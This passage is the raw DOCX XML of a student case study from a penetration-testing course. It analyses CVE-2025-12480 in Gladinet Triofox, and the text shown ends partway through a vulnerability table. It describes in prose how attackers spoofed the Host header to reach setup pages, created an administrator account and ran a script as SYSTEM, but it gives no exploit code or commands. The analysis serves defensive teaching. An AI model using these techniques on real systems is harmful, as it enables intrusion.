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line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4860000" cy="1458000"/>
            <wp:docPr id="1" name="Picture 1"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="vit_logo.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4860000" cy="1458000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="280" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="737373"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:t>_______________________________________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>BCSE319L_PENETRATION TESTING AND VULNERABILITY ANALYSIS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CASE STUDY – II</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="720" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Fall Semester 2026–2027</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>CVE-2025-12480: From Broken Access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Control to Remote Code Execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>in Gladinet Triofox</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="800" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>An OWASP Top 10:2025 (A01 – Broken Access Control) analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Submitted by</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="800" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>1. 23BCE0703: ANSHVEER SINGH</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Course Instructor Details</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Dr. K. Thangaramya</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Assistant Professor Sr. Grade 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>School of Computer Science and Engineering (SCOPE)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="800" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Vellore Institute of Technology, Vellore</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1  Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">In November 2025, Mandiant Threat Defense disclosed the active exploitation of CVE-2025-12480, an improper access control vulnerability in Gladinet's Triofox file-sharing and remote access platform. A single missing authorisation check let an unauthenticated, remote attacker reach the application's first-run setup pages long after installation was complete. From that foothold the threat cluster tracked as UNC6485 created a native administrator account, abused Triofox's built-in anti-virus feature to run a script as the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> account, and went on to deploy legitimate remote management tooling, tunnel Remote Desktop traffic out over SSH, and attempt domain privilege escalation. The flaw carries a CVSS 3.1 base score of 9.1 and was added to the CISA Known Exploited Vulnerabilities catalogue on 12 November 2025.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">This case study reconstructs the documented attack chain from primary vendor and incident sources, then examines why a flaw of this class belongs at the top of the OWASP Top 10. The 2025 edition keeps Broken Access Control as category A01, and the Triofox intrusion is close to a textbook instance of it: a server-side authorisation decision was driven by an attacker-controllable value, the HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> header. The analysis maps the incident primarily to A01:2025 and, where the evidence supports it, to the secondary categories of Security Misconfiguration (A02), Insecure Design (A06), and Security Logging and Alerting Failures (A09). It keeps three things apart throughout: facts documented by Mandiant, Rapid7, and the CVE record; the author's interpretation of them; and a proposed, authorised-lab testing methodology. No production Triofox system was accessed, and no result is presented as observed first-hand.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2  Introduction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Managed file transfer and enterprise file-sharing products sit in an awkward position. They are deliberately exposed to the internet so that staff and partners can reach documents from anywhere, and they are trusted with the credentials and storage that make them worth attacking. That combination has made the category a recurring target. Gladinet's own product family illustrates the pattern: CentreStack and Triofox absorbed three separately tracked, actively exploited vulnerabilities during 2025 alone.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2025-12480 is the most instructive of the three because its root cause is so ordinary. There was no memory-corruption primitive, no cryptographic break, and no novel exploitation research. A page that should only ever be reachable during first-time setup remained reachable afterwards, and the check meant to gate it trusted a field that any client can set. Everything downstream, including code execution as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> and lateral movement toward Domain Admins, followed from that one logic error. That makes it a useful anchor for the OWASP Top 10:2025, whose refreshed list keeps Broken Access Control at number one after every tested application in the contributing dataset showed some form of it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="180" w:after="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>2.1  Scope and evidence tiers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">To keep analysis honest, the report labels claims by their basis. Statements drawn directly from primary sources are marked </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="737373"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[documented]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">. The author's reasoning about those facts is marked </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="737373"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[interpretation]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">. Testing activity that is proposed but not performed is marked </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="737373"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[proposed]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>. The reader should assume no access to the affected production environment at any point.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>3  Background</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="180" w:after="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>3.1  The product and the vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Triofox is a Windows-hosted platform that turns existing file servers into a browser- and agent-accessible service with remote access, sharing, and synchronisation. It runs on IIS as an ASP.NET application. On first installation, Triofox launches a setup workflow at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AdminDatabase.aspx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> where an operator selects a database backend, optionally connects LDAP, and creates the initial native administrator, referred to in the product as a cluster admin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>CVE-2025-12480 is recorded by Mandiant, acting as a CVE Numbering Authority under Google, as an improper access control flaw: Triofox versions prior to 16.7.10368.56560 allow access to those initial setup pages even after setup has completed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="737373"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> [documented]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>. Table 1 collects the verified vulnerability metadata.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160" w:after="60"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 1.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Vulnerability profile for CVE-2025-12480.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblW w:w="9355" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3118"/>
        <w:gridCol w:w="6237"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Attribute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6236"/>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CVE identifier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6236"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CVE-2025-12480</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Assigning CNA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6236"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Mandiant (under Google)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Weakness class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6236"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CWE-284, Improper Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
